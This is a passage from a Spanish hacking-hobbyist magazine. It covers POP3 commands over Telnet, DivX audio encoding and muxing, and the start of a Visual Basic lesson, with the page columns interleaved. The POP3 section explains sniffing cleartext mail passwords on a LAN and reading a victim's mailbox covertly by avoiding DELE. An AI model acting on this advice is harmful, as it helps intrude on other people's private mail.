  • 17. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 saturada. un mail veo la i acentuada? Pues porque Outlook, cuando 2.3.5. Comandos DELE y RSET recibe esa cadena, la transforma de nuevo en "í". Es como Pero, ¿cómo borraba ese dichoso mensaje que un traductor automático. me estaba saturando la cuenta? Pues para eso Si quisiesemos profundizar en el problema, deberíamos tenemos el comando DELE, que lo que hace hablar del standar MIME (Multipurpose Internet Mail es precisamente eliminar un mensaje del Extensions Encoding), la IETF (Internet Engineering Task servidor. Este comando es muy importante, ya Force), cómo es tratada la cabecera de un mail (en estricto que el proceso que sigue un cliente de correo USA-ASCII), cómo es tratado el mensaje (depende de la (a no ser que se configure para que actúe de codificación especificada en la cabecera) y unas cuantas otra manera) al recibir el correo es el siguiente: cosas más… poco a poco llegaremos :) 1- autentificarse para entrar en la cuenta (USER y PASS, u otros sistemas de 2.3.4. Comando TOP autenticación que no puedo explicar por falta ¿Y si en lugar de 956 bytes el mensaje ocupa de espacio, como son APOP y AUTH) 30000 bytes y aún así queremos ver, por 2- ver los mensajes que hay en el servidor ejemplo, quien nos envía ese mensaje? (STAT y LIST, y posiblemente otros comandos ¿Tenemos que tragarnos los 30KB de mensaje que tampoco explicaré, como UIDL) solo para buscar un dato de la cabecera? Para 3- bajar los mensajes al PC local del usuario evitar eso tenemos precisamente el comando (RETR) TOP. 4- borrar los mensajes ya bajados del servidor, Este comando nos permite ver sólo las primeras ya que los tiene ya el usuario en su PC (DELE) líneas de un mensaje, sin necesidad de bajar 5- salir de la cuenta (QUIT) el mensaje entero. Así, si escribimos: Por tanto, una vez se hace un RETR de un TOP 2 20 mensaje, es habitual que queramos liberar el El servidor nos mostrará las 20 primeras líneas espacio en el servidor, ya que ese mensaje ya del mensaje número 2. Podremos así ver la lo hemos leído. Para borrar el mensaje número cabecera para hacernos una idea de si nos 3, por ejemplo, haremos: interesa o no el resto del mensaje. DELE 3 Este comando me fue muy útil hace años, Si por cualquier motivo nos arrepentimos de cuando utilizaba una cuenta shell con espacio haber borrado algún mensaje, podemos limitado la cual se me saturaba cada vez que echarnos atrás, siempre y cuando estemos alguien me enviaba un archivo adjunto todavía en la misma sesión, utilizando el relativamente grande. Cuando intentaba recibir siguiente comando: mi correo desde la cuenta shell, sólo podía RSET recibir los mensajes que había antes del mensaje Este comando anulará todos los DELE que se grande, ya que al llegar a ese punto daba un hayan hecho en esa sesión. error y no había manera de recibir el resto de 2.3.6. Comando QUIT mensajes. Mi única solución, aparte de dar el Un premio para el que adivine qué hace este coñazo al administrador del sistema, era comando... conectarme por Telnet al servidor POP3, ver La única consideración a tener en cuenta es mediante el comando TOP si ese mensaje que, cuando se cierra la sesión con QUIT, es gordo me interesaba, o lo podía borrar el momento en el que se hacen efectivos los directamente, y arreglar el entuerto sin comandos DELE, por lo que a partir de este necesidad de conectarme a mi cuenta shell momento los mensajes que se hayan borrado serán ya irrecuperables. PC PASO A PASO Nº 7 Página 17
  • 18. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 2.4. CONCLUSIONES DE SEGURIDAD Suponiendo que consiguieseis robar algún En POP3 hay básicamente 3 mecanismos password por este sistema, o por cualquier diferentes de autenticación, de los cuales sólo otro, y quisieseis ver el correo de la pobre he explicado uno por falta de espacio. Este víctima sin que ésta se entere, está claro que mecanismo es el que utiliza los comandos no podréis hacerlo utilizando un cliente de USER y PASS, como hemos visto. correo por las buenas, ya que éste borrará los Supongo que entre vosotros habrá unos cuantos mensajes una vez leídos, de tal forma que el avispados que se habrán frotado las manos al usuario legítimo de la cuenta de correo no descubrir que los passwords llegan hasta el podrá leerlos después de que los hayas servidor sin ningún "interceptado" tú y eso, aparte de ser una tipo de codificación ni encriptación (cosa que putada, cantaría mucho tras varios días sin no ocurre cuando se realiza la autenticación recibir un sólo mensaje. Una solución a esto mediante los comandos APOP o AUTH). sería ver el correo tal y como os he explicado, En efecto, si vuestro PC está en una red local utilizando un cliente de Telnet, y escribiendo con varios usuarios, e instaláis un sniffer en vosotros mismos los comandos que os interesen, vuestro PC, podréis ver sin ningún problema es decir, cualquiera menos el comando DELE, todos los passwords de correo de los usuarios que sería el que jodería el invento. Por supuesto, que utilicen cuentas con este tipo de otra solución sería configurar vuestro cliente autenticación. Por supuesto, no sólo podréis de correo para que no borre los mensajes una ver los passwords, si no también el resto de vez leídos, pero... eso sería menos divertido, la sesión POP3, que incluye el contenido de ¿verdad? ;-) todos los mensajes. PyC_LCo (La Corporación) SI TE GUSTA LA INFORMÁTICA. SI ESTAS “CABREADO” CON GÜINDOUS ;) SI QUIERES PROGRESAR DE VERDAD Incluye 7 CD’s y 1 DVD PC PASO A PASO Manual de Instalación. SOR TEA CADA MES UN S.O. Manual de Administracion SUSE LINUX PR OFESSION AL 8.1 SIMPLEMENTE ENVIA LA PALABRA PCCON AL 5099 DESDE TU MOVIL PRECIO DEL MENSAJE: 0,90€ + IVA. VALIDO PARA (MOVISTAR - VODAFONE Y AMENA) IVA. VALIDO PARA (MOVISTAR EL PREMIO PUEDE SER CANJEABLE POR UN JUEGO DE PC O CONSOLA QUE NO SUPERELOS 85€ EL GANADOR SALDRA PUBLICADO AQUÍ 2 NÚMEROS DESPUES DE LA PUBLICACIÓN. Página 18 PC PASO A PASO Nº 7
  • 19. PASA TUS PROPIAS PELICULAS A DIVX;) PARTE III: EL AUDIO En el número 6 de PC PASO A PASO publicamos será de agradecer si se tiene un sistema dolby la PARTE I y II de este artículo, donde digital de altavoces. aprendimos a extraer y comprimir el video. Con el mp3 conseguiremos un tamaño de A estas alturas ya tenemos en nuestro disco archivo para el audio muy aceptable, pero con duro un archivo de video que contiene la algo menos de calidad en el sonido, además película, pero le falta algo tan importante como de una gran compatibilidad con la mayoría de la imagen: EL SONIDO :) los equipos que tengan tus amigos y les vayas a dejar la peli. En este caso solamente nos I M P O R T A N T E : L o s p r o g ra m a s q u e quedaremos con sonido en dos canales, derecho utilizaremos en este ejercicio estarán disponibles (R) e izquierdo (L) propios del stereo. en nuestra Web (www.hackxcrack.com) y por supuesto en la Web oficial de cada programa. Y por último, comentaremos el ogg que es un Y si quieres más, ya sabes, utiliza el eMule (ya nuevo proyecto que pretende estar a mitad de te lo presentamos en el número 6 de PC PASO camino entre el mp3 y el ac3. Este último A PASO). consigue la misma calidad que un mp3 con menos bitrate, y por tanto, menor tamaño de 1. DECIDIENDO QUE CODEC archivo; además se puede configurar para DE AUDIO USAR comprimir no solo 2 canales, sino 4 para tener más calidad en el audio. Lo primero que debemos decidir antes de ponernos a hacer el sonido es el formato en ! Elegiremos AC3... el que queremos que esté comprimido. De todos es conocido que hay multitud de codecs Elegiremos ac3 para la calidad, mp3 para la compatibilidad, de audio, como son mp3, ac3, wma, pcm, ogg, y ogg para tener más calidad que en mp3 ocupando el atrac-3 (en MD),… mismo espacio. Cada uno tiene sus propias ventajas frente a los demás. El sonido de las películas viene por 2. EL AC3 lo general en ac3, y a veces en DVD´s de música como el que viene con el último disco Si queremos emplear este formato deberemos de Platero, la pista de audio viene comprimida sacar la pista de audio en ac3 con el dvd2avi, en pcm. como se explicó en la revista 6. En este artículo nos vamos a fijar en tres codecs El ac3 tiene la ventaja de que si no queremos para nuestras películas, el ac3, el mp3 y el modificarlo, podemos dejarlo tal como esta al nuevo ogg. sacarlo del dvd. Esto puede ser recomendable si tenemos una película de menos de 110 Con el AC3 podremos conseguir una calidad minutos que queremos pasar a dos CD´s. El muy alta de sonido, a costa de tener que sonido en ac3 ocupará en torno a los 350 reservar más espacio para el audio. Además megas, lo que nos deja 1100 megas para el conservaremos los 6 canales de audio, que video, resultando un bitrate para el video de PC PASO A PASO Nº 7 Página 19
  • 20. DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO unos 1300. ¿Que supone todo esto?, pues muy seleccionando en tipo Dolby Digital (Decode to sencillo, vas a tener el mejor audio que le PCM) (.ac3) . Esto hará que el audio se puedes poner a la película, y además la calidad descomprima y pase a pcm al abrir el archivo, del video también será excelente. lo cual llevará un ratito. Una vez terminado nos iremos a la pestaña ! El bitrare... OptionsEncode settings… ya que es lo que vamos a hacer. El bitrate del video acuérdate de calcularlo tal como se explicó en el número anterior, que los valores que pongo aquí son aproximados. Si la película en cuestión dura mas de ese tiempo ya empezaremos a tener que racanear en bitrate para el video si queremos conservar el audio en ac3, pero también podemos modificar el ac3 para que ocupe menos, y así no tener que bajarle la calidad al video. Para ello recomprimiremos el ac3 pero bajándole el bitrate para que el tamaño del archivo se En Data Rate pondremos el bitrate que disminuya considerablemente. queremos para el nuevo archivo en ac3. Nunca menos de 224 kbs. Y el resto de opciones las Para manipular el ac3 utilizaremos el Sonic dejamos por defecto. Le damos a OK y nos Foundry Soft Encode. disponemos a comprimir el audio pulsando sobre el botón de grabar (el circulo rojo). Ya solo queda dejarle hacer. 3. EL MP3 Si queremos emplear el mp3 deberemos sacar el audio en pcm como se dijo en la revista 6. El MP3 es el formato de audio más extendido en Internet, con lo cual no creo que tenga que hablar mucho sobre él, ya que en google podrás encontrar mucha información. De entre todos los codecs que hay para comprimir a mp3 utilizaremos el lame, ya que permite la compresión en vbr. El sonido en mp3 se puede comprimir También necesitaremos mucho, pero que principalmente en dos formatos, el cbr (constant mucho, espacio en disco duro para hacer esto. bitrate) y en vbr (variable bitrate). El primero Le damos a FileOpen y seleccionamos el hará que toda la pista de audio se comprima archivo ac3 que queremos manipular, y con el mismo bitrate y el segundo hará que el Página 20 PC PASO A PASO Nº 7
  • 21. DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO bitrate se modifique en función de la necesidad, usaríamos para cbr, pero como vamos a usar utilizando más bits para los momentos de vbr pondremos bitrate de 32, y así marcaremos mayor cantidad de sonidos (explosiones, peleas, cual es el mínimo que debe de usar. En mode gritos, …) y menos en donde no se requiera podremos seleccionar entre mono o los (como en los silencios en las conversaciones). diferentes tipos de stereo, en mi caso prefiero Para obtener mejor calidad en el sonido el stereo normal. El joint stereo sirve para hacer emplearemos este último modo. que los canales L y R se separen más, lo cual en audio extraído de dvd no será de ninguna Para comprimir utilizaremos el programa Razor utilidad. Y por último seleccionaremos la carpeta Lame. en la que queremos que se cree el archivo de destino. Nos pasamos a la carpeta Advanced y en Optimization seleccionamos Quality, lo demás lo dejamos todo sin marcar. Pasamos a la pestaña VBR, donde nos aseguramos de marcar la casilla Enable variable bitrate (vbr) . En maximun bitrate pondremos el máximo bitrate que queremos que use en la compresión, yo suelo usar un valor de 224, que hará que la mayor parte de la película se quede entre el 128 y el 192. En quality elegiremos el valor 4, aquí indicamos el nivel de relación calidad/tiempo que queremos que use, a menor valor mejor calidad y más tiempo tardará, y a En primer lugar deberemos comprobar que en mayor valor, menor calidad y tardará algo la carpeta options, en la parte de Lame, hay menos de tiempo. Por supuesto lo que mas va una ruta en la cual se especifica el archivo a influir en la calidad del sonido va a ser el Lame.exe, que es el verdadero compresor. Esto bitrate, pero esto influirá en una pequeña se debe a que en realidad la compresión se medida ya que hará que se utilicen diferentes realiza a través de una línea de comando algoritmos de compresión. Tomamos el valor MS-DOS, pero el razorlame nos ayudará a de 4 por ser el medio-alto. En las opciones de configurar el compresor sin necesidad de la derecha solo marcaremos la de strictly enforce aprenderse complicadas sintaxis de DOS. minimum bitrab que forzará a que el codec busque los puntos en los que puede usar un bitrate más bajo. Si usaremos el ABR (Average ! El razorlame... BitRate-Media BitRate), estaríamos indicando el bitrate que queremos que salga de media, pero es mejor dejarle hacer y que salga lo que El razorlame nos quita la pesada tarea de mirarnos los mejor quede según el codec. comandos DOS En la pestaña Expert lo dejaremos todo sin marcar, y en la parte de ATH control dejaremos Le damos a OK y nos vamos a las LAME options, default y en q level pondremos el valor 2.Y en que es donde configuramos el codec. En la la última pestaña, audio processing, no hace carpeta general seleccionamos el Bitrate que falta marcar nada. PC PASO A PASO Nº 7 Página 21
  • 22. DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO En la parte de debajo de la pantalla podrás ver la línea de comandos que habría que introducir para hacer la compresión desde MS-DOS. Arriba podrás guardar las opciones con el nombre que quieras para que en futuras ocasiones no más que cargarla para tener las opciones configuradas. Una vez lo tenemos todo configurado pulsamos sobre el botón add y añadimos el archivo .wav que contiene el audio de la película y que sacamos con el dvd2avi. Ahora solo queda darle a encode y mirar durante el tiempo que tarde el grafico que indica los porcentajes de bitrate que usa. Verás que en su mayoría la película estará en 192. 4. EL OGG VORBIS Este formato es de los más recientes que hay. Es un proyecto en el cual están intentando conseguir mejores calidades con bitrates mas bajos y poder comprimir varios canales. Deberemos haber sacado el audio con el dvd2avi en formato ac3. Este codec tiene la desventaja de que para dejarle a un colega una película En primer lugar seleccionaremos en Source File tendréis que acompañar el CD con unos archivos el archivo de origen, y automáticamente se de codecs y de filtros para que lo pueda oír, rellenará también la casilla del archivo de y que en algunas ocasiones no han llegado a destino. En Stream Info podremos ver la funcionar del todo, aunque nunca ha información sobre el archivo de origen. habido problemas con wMe y wXp. A favor del codec diré que ha sido utilizado en el reciente En destinantion format seleccionaremos Vorbis, juego Unreal Tournament 2003, que no me ya que estamos pensando en usar el Ogg vorbis. negareis que tiene una alta calidad en el audio, Elegirmes 2-pass mode, al igual que hicimos así como en el video… (Bueno, que me salgo con el video, haremos dos pasadas para del tema). comprimir el audio, con las mejoras que eso Lo primero es conseguir el OggDirectShowFilters conlleva. Lo siguiente es elegir entre dumb, y el SubTitDS que nos podemos bajar de la que utilizará mucho espacio de disco duro para página de Tobias o de la página de HackXCrack. la primera pasada ya que descomprimirá el A continuación tendrás que hacerte con el audio en el disco duro, float, que no usará mas HeadAC3he, programa que utilizaremos para espacio en disco duro de lo que ocupe el archivo la compresión a ogg. final, o hybrid, que como su nombre indica, es Página 22 PC PASO A PASO Nº 7
  • 23. DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO un híbrido de los anteriores. En esta ventana veremos los canales que tiene el archivo de origen, y seleccionaremos los Star frame y end frame los usaríamos si no canales que queremos que tenga el de destino. quisiésemos comprimir todo el sonido, sino Pero mejor que ponernos a hacerlo "a pelo", solo una parte de él, como por ejemplo, si le seleccionaremos una de las opciones que quitamos los créditos del final a la peli. En aparece en la casilla Downmix Type. Aquí Resimple podríamos cambiar la frecuencia de tenemos a elegir entre sonido mono, stereo y muestreo del audio. Y por último, en Priority, surround. Yo suelo usar el surround 2, pero lo señalamos la prioridad que tendrá el proceso mejor es probarlo y ver que es lo que mas nos de compresión. convence, ya que dependerá del tipo de equipo en el que lo vamos a probar, no es lo mismo ponerlo con una tarjeta SB128 o una SBAudigy2. ! Dejo a tu cargo... A la derecha tenemos las opciones del número de canales, a elegir entre 2, 4 o 6 canales. Con dos canales funciona perfectamente, pero con Dejo a tu cargo el que aprendas a seleccionar las partes más a veces da fallos. Yo tengo varias películas que quieres comprimir en el vdub. pasadas a 4 canales, y la verdad es que mejora mucho el sonido si lo comparamos con los dos míticos del mp3, y además el archivo de destino A continuación le damos a Options y aparecerá no es excesivamente grande. una nueva ventana: ! Recordemos siempre... Recordemos siempre que el ogg es un proyecto, con lo que puede tener fallos en ciertas ocasiones, como en el caso de los canales. A continuación volveremos a darle al botón Options y aparecerá otra pantalla: PC PASO A PASO Nº 7 Página 23
  • 24. DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO Aquí elegiremos el bitrate y el modo de Volvemos a darle al botón options para que se compresión que queremos que use, CBR, VBR quite de en medio la ventanita de las opciones o ABR. Por los mismos motivos que en el mp3, y le damos a Start para que empiece a seleccionaremos VBR. En Quality marcaremos comprimirse la pista de audio al formato ogg. un valor de 3.00. Y por fin, configuraremos el bitrate. El ogg consigue la misma calidad que el mp3 pero con menor bitrate, por ! MUY I M P O RTA N T E . . . ello, seleccionaremos O para el minimun, 112 para el average y 511 para el maximun. MUY IMPORTANTE: Para escuchar las películas que Los valores mínimo y máximo podéis contiene el audio en ac3 se necesitan los AC3filters, que cambiarlos, por ejemplo a 32 y 224 igual que podrás encontrarlos en nuestra Web (www.hackxcrack.com) en el mp3. SUSCRIBETE A PC PASO A PASO 45 EUROS (10% DE DESCUENTO) SUSCRIPCIÓN POR: + 1 AÑO = SORTEO DE UNA CONSOLA XBOX + 11 NUMEROS SORTEO 2 JUEGOS PC (A ELEGIR) Contra R e e m b o l s o Giro Post al Solo tienes que enviarnos un mail a preferente@hackxcrack.com Envíanos un GIRO POSTAL por valor de 45 EUROS a: indicando: CALLE HIGINIO ANGLES Nº2, 4º-1ª - Nombre CP 43001 TARRAGONA - Apellidos ESPAÑA - Dirección Completa IMPORTANTE: En el TEXTO DEL GIRO escribe un mail de contacto - Población o un número de Teléfono. - Provincia - Cógigo Postal Y enviarnos un mail a preferente@hackxcrack.com indicando: - Mail de Contacto y/o Teléfono Contacto - Nombre Es imprescindible que nos facilites un mail o teléfono de contacto, - Apellidos puesto que 24 horas después de que recibamos tu petición de - Dirección Completa subscripción te daremos un número de Cliente Preferente. Este - Población número será utilizado para los sorteos. - Provincia - Tipo de Subscripción: CONTRAREEMBOLSO - Cógigo Postal - Número de Revista: - Mail de Contacto y/o Teléfono Contacto Este será el número a partir del cual quieres subscribirte. Si deseas Es imprescindible que nos facilites un mail o teléfono de contacto, (por ejemplo) subscribirte a partir del número 5 (incluido), debes poner puesto que 24 horas después de que recibamos tu petición de un 5 y te enviaremos desde el 5 hasta el 15 (ambos incluidos) subscripción te daremos un número de Cliente Preferente. Este número será utilizado para los sorteos. APRECIACIONES: - Tipo de Subscripción: GIRO POSTAL * Junto con el primer número recibirás el abono de 45 euros, precio - Número de Revista: de la subscripción por 11 números (un año) y una carta donde se te Este será el número a partir del cual quieres subscribirte. Si deseas indicará tu número de Cliente Preferente y justificante/factura de la (por ejemplo) subscribirte a partir del número 5 (incluido), debes poner subscripción. un 5 y te enviaremos desde el 5 hasta el 15 (ambos incluidos) * Puedes hacernos llegar estos datos POR MAIL,tal como te hemos indicado; rellenando el formulario de nuestra WEB APRECIACIONES: (www.hackxcrack.com) o enviándonos una carta a la siguiente dirección: * Junto con el primer número recibirás una carta donde se te indicará CALLE HIGINIO ANGLES Nº2, 4º-1ª tu número de Cliente Preferente y justificante/factura de la subscripción. CP 43001 TARRAGONA * Puedes hacernos llegar estos datos POR MAIL,tal como te hemos ESPAÑA indicado; rellenando el formulario de nuestra WEB * Cualquier consulta referente a las subscripciones puedes enviarla (www.hackxcrack.com) o enviándonos una carta a la siguiente dirección: por mail a preferente@hackxcrack.com CALLE HIGINIO ANGLES Nº2, 4º-1ª CP 43001 TARRAGONA ESPAÑA * Cualquier consulta referente a las subscripciones puedes enviarla por mail a preferente@hackxcrack.com Página 24 PC PASO A PASO Nº 7
  • 25. PASA TUS PROPIAS PELICULAS A DIVX;) PARTE IV: MULTIPLEXANDO De momento ya tenemos un archivo avi que 2. MULTIPLEXAR EL AC3 Y EL MP3 contiene el video y un archivo ac3, mp3 u ogg que contiene el audio. Es hora de juntarlos en Ambos formatos los vamos a multiplexar de la uno solo y tener nuestra película en un solo misma forma, y con el mismo programa. archivo. Necesitaremos el Nandub, que no es más que un mod del virtualdub. Te explico, cuando te 1. MULTIPLEXAR bajaste el virtualdub de su página verías que también tenías la posibilidad de descargarte el Multiplexar es propiamente juntar la parte del código fuente del programa. Pues hay gente audio con la del video, pero no todo es un que se ha dedicado a modificar el vdub en corta y pega que podamos hacer de cualquier busca de solucionar sus exigencias, de esta forma. Algo muy importante en una película forma surge el Nandub, desarrollado para hacer es que la imagen y el sonido sean síncronos, dos pasadas en los tiempos en que el divx 3.11 es decir, que el sonido suene justo cuando se no permitía hacerlo, y con las opciones añadidas ve la acción que lo produce. Quedaría muy mal de poder multiplexar no solo audio en pcm, ver como alguien se va todo cabreado, da un sino también en mp3 y ac3. También veréis portazo y sin embargo no lo oímos hasta un que en teoría, acepta el formato ogg, pero no segundo más tarde, nos resultaría raro, e es recomendable usar el nandub para este incluso contribuiría en gran medida a no formato porque en ocasiones el sonido a medida enterarnos de la película porque las cosas se que avanza la película se va desfasando. oirían cuando no las esperamos. ! Con la multiplexación... Con la multiplexación haremos que el video y el audio se junten en un solo archivo Al sacar la pista de audio de los archivos con el dvd2avi, en el nombre del archivo que crea con el sonido, se incluye el tiempo de desfase que hemos de salvar a la hora de multiplexar. Este valor esta incluido en ms junto con la palabra delay. Otra de las ventajas del ogg es que esto no nos importará porque los propios programas que usamos ya lo corrigen automáticamente al leerlo en el nombre del archivo. PC PASO A PASO Nº 7 Página 25
  • 26. DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO Para juntar los dos archivos lo primero que ningún mod del virtualdub. Este caso vamos a tendremos que hacer es cargar el de usar el OggMux: video, para ello nos vamos a la pestaña FileOpen video file.. Y seleccionamos nuestro archivo avi que contiene el video de la película. A continuación, y muy importante, nos iremos a la pestaña Video y seleccionaremos Direct Stream Copy, para que no modifique el video que tenemos. Ya solo queda seleccionar la pista de audio, para ello nos vamos a la pestaña audio y seleccionamos el tipo de pista que vamos a usar, ac3 o mp3, y seleccionamos el archivo de sonido que creamos anteriormente. De esta forma ya tenemos el audio que queremos juntar seleccionado. Tenemos que asegurarnos que en esta pestaña de audio también está marcada la opción Direct Stream Copy. En primer lugar seleccionaremos el archivo que contiene el video en la parte de Movie, pulsando ! Insistir en el tema... sobre los tres puntos (…), si quieres puedes darle a Edit movie info y añadir la información del titulo, autor, … Insistir en el tema del Direct Stream Copy En Soundtracks seleccionaremos los archivos de audio que queramos añadir. Y si, resalto el Ahora nos ocuparemos de que el audio y el plural por una sencilla razón, con el ogg video sean síncronos, para ello en la carpeta podemos añadir más de una pista de audio, audio pulsaremos sobre la opción Interleavin, con lo que podremos tener el audio en español y en la casilla Audio Skew Correction e inglés, por ejemplo. Con los otros codecs introduciremos el valor que nos indica el delay. también se puede hacer, pero por cada pista En caso de no tener ningún delay, este paso se chupa algo más de espacio. Me explico, al nos lo podríamos saltar. A continuación juntar el video y el audio, el archivo resultante pulsamos OK, y ya tendremos el programa es algo más grande que si sumas los tamaños, preparado para crear un archivo avi que pero con ogg esto es prácticamente contenga el video en divx y el audio en mp3 despreciable. o ac3. Para añadir las pistas de audio seleccionaremos Iremos a FileSave as avi… y el resto ya sabéis los puntitos y la pista a añadir, a continuación como va. le daremos al botón Add en el oggmux, ya que sino, no se añadirá. En la lista debajo de los 3. MULTIPLEXAR EL OGG puntitos aparecen las pistas de audio que se van a añadir. Además le puedes indicar el idioma Para multiplexar el ogg no vamos a utilizar en que estará el sonido. Página 26 PC PASO A PASO Nº 7
  • 27. DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO Hay otras dos opciones, una para añadir de una pelea, o El Señor de los Anillos en subtítulos, que no usaremos porque no hemos medio de la carrera por las minas de Moria. tratado el tema en ningún momento, y otra para añadir los capítulos que trae en el dvd, Para el ogg podemos usar el OggCut, que es indicando la duración de cada uno. Información un programa muy sencillo de usar que no que puedes obtener del archivo de texto que explicaré. Además no es demasiado bueno. sacaba el smart ripper. Hay un programa que nos va a servir para hacer Ya por último, en target, seleccionaremos donde el postprocesado independientemente del queremos que saque el archivo resultante y formato de audio, ¿adivináis lo que es?..., como queremos que se llame. Por último le supongo que lo estaréis pensando, otro mod daremos a Mux File! Para que proceda con la del virtual dub. Este directamente se llama multiplexación. VirtualDub Mod, y no solo nos sirve para el postprocesado, también para la multiplexación, El archivo resultante tendrá una extensión pero así has conocido ya a dos mods del vdub. .ogm que puedes cambiarla por .avi sin miedo, Por cierto, también vale para multiplexar los o dejarla como esta y asociar el archivo con ogg. tu reproductor de video preferido. Para poder escuchar estas películas se necesitan los direct show filters del ogg. Hay que recordar que el ogg es un proyecto, ya se que me repito, pero es que puede que os de algún problema y no quiero que os cabreeis. 4. EL POSTPROCESADO Esto consiste en manipular el archivo que hemos creado que contiene la película entera, es decir, video y audio juntos. La razón de que queramos manejarlo, es que por ejemplo, si Lo que voy a explicar vale tanto para el decidimos hacer la película en dos CD´s, ahora virtualdub, como para el nandub, como para el nos encontramos con un archivo de 1400 megas vdub mod. De forma que si has decidido no que querremos cortar para poder copiarlo. usar el ogg, no tienes porque hacerte con el mod, te valdrá el Nandub. Yo recomiendo que cuando pretendáis hacer las películas para dos CD´s, no hagáis los cálculos para 1400 megas, sino para entre los ! En esta ocasión... 1300 y 1350, ya que os dará flexibilidad y margen de error en los resultados. La flexibilidad En esta ocasión hablamos de dos mods del virtualdub, pero consiste en que a la hora de cortarla, si tenemos si os ponéis a buscar es posible que encontréis otros muchos un archivo de cerca de los 1400 Mb, tendremos que os ayuden en algún paso de la creación del divx que cortar el archivo justo por la mitad, lo que puede suponer cortar la película en un momento Lo primero que tenemos que hacer es cargar el archivo avi poco apropiado, como si cortas Matrix en medio como hemos hecho otras veces. A continuación, y muy PC PASO A PASO Nº 7 Página 27
  • 28. DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO importante, es marcar en las pestañas de audio 5. THE END y video la opción Direct Stream Copy, además de señalar en la del audio la opción AVI audio, Aquí concluye el artículo sobre el paso de DVD para que el audio que utilice sea el que ya esta a DivX;). Espero que a los que no tenían ni en el avi cargado. idea del tema les haya servido y a los que conocían el tema les haya interesado. Hay Lo siguiente es decidir donde queremos cortar multitud de formas de pasar a divx una película la película. En función de lo que queramos que tengamos en dvd, pero se ha elegido esta podemos usar varios métodos. En primer lugar, para el artículo porque es la forma en la que con la barra de desplazamiento en el principio, más se aprende. Si buscáis por la red pulsaremos el botón que es como una flecha encontraréis muchos manuales de 3 hojas de negra apuntando a la izquierda, que marcará Word que te explican a pasar una película, pero el inicio de la selección. (De los botones de con los cuales no aprendes lo que estas abajo, los de mas a la derecha.) haciendo, no te dicen porque marcar una casilla o no, simplemente lo haces porque lo pone ahí, Ahora podemos mover la barra de y eso creo que va en contra del espíritu de esta desplazamiento hasta el punto donde queramos publicación. cortar la película, o bien, si queremos cortarla en el cambio de capitulo X que está hacia el Espero que para el día que salga el número 7 medio, podemos ver en el txt del smartripper a la calle los programas estén ya puestos en la el tiempo exacto en el que se produce el cambio Web de Hack X Crack, no obstante, si tenéis e introducirlo en el dub dándole a EditGo to… dificultades para encontrarlos, confiad en google y usad lo que os enseñaron en la revista para Una vez colocada en donde queremos cortar conseguir programas. la barra de desplazamiento, pulsaremos sobre la flecha que señala hacia la derecha que Saludotes. indicará el final de la selección. Verás como en la barra aparece un color azul que indica la selección. Ahora nos vamos a save as avi, y guardará en un archivo la primera parte de la película. Una vez acabado, y dado que la barra estará colocada donde acababa el primer trozo, pulsaremos sobre la flecha que mira a la izquierda, asegurándonos así que la marca de inicio de la segunda mitad coincide con la del final de la primera. Ahora nos vamos a EditEnd, de forma que la marca de la barra se colocará al final de la película. Pulsando otra vez sobre la flechita que mira a la derecha habremos hecho la selección de la segunda parte, que guardaremos de forma análoga a la primera. Página 28 PC PASO A PASO Nº 7
  • 29. Un ejercicio esencial la calculadora Por Pedro del Valle Bienvenidos de nuevo. Hoy, y a petición vuestra, adelantaremos temario y dejaremos atrás parte de la teoría que tenía pensado explicar para este artículo. Primero agradeceros a todos vuestras críticas en el foro de la revista, os garantizo que han sido escuchadas, tanto las buenas como las malas. Generalizando, hubo un grito unánime por parte vuestra, "más velocidad y más extenso", y por eso hoy, después de una ligera introducción a un nuevo concepto como son las variables, intentaremos crear de principio Aquí es donde diseñaremos nuestra calculadora a fin una calculadora. Y no solo eso, sino que así como la mayoría de los proyectos que una vez acabada intentaremos darle la vuelta haremos durante los cursos. Para hacer una a la tortilla y complicar el ejercicio. prueba con las variables utilizaremos el conocido MsgBox. 1. Algo de teoría: Las variables Tranquilos...., seré breve en este ejemplo, pero creedme cuando digo que es totalmente Antes de explicar el extenso mundo de las necesario. variables me gustaría dejar claro que lo que Lo primero que debemos hacer es acceder al aquí voy a escribir puede ser mas o menos editor del Visual Basic, para ello tenemos dos correcto según quien lo lea, pero de lo que métodos, el primero es efectuar doble click podéis estar seguros es de que acabareis sobre el formulario, como ya vimos en el primer entendiéndolo, y aun así, cada uno se hará su curso. El otro método es haciendo click sobre propio concepto sobre las variables. el botón blanco superior derecha que vemos Bien, una vez dicho esto, pasamos a explicarlo. en la imagen. Las variables podrían ser considerados como pequeños espacios de memoria reservados para almacenar un tipo de dato predefinido anteriormente por el programador. En algunos casos el tipo de dato no está predefinido, por lo que lo adquiere a la hora de asignarle el valor (este ultimo caso es el que conocemos como variables de tipo "variant"). Después de este tremendo "rollo"teórico, intentaré plasmar lo dicho en la práctica. Para ello debemos abrir el VB y elegir la opción "EXE stándard" en la ventana hija que nos aparece. Podemos observar que nos aparece un formulario vacío con el nombre "Form1". PC PASO A PASO Nº 7 Página 29
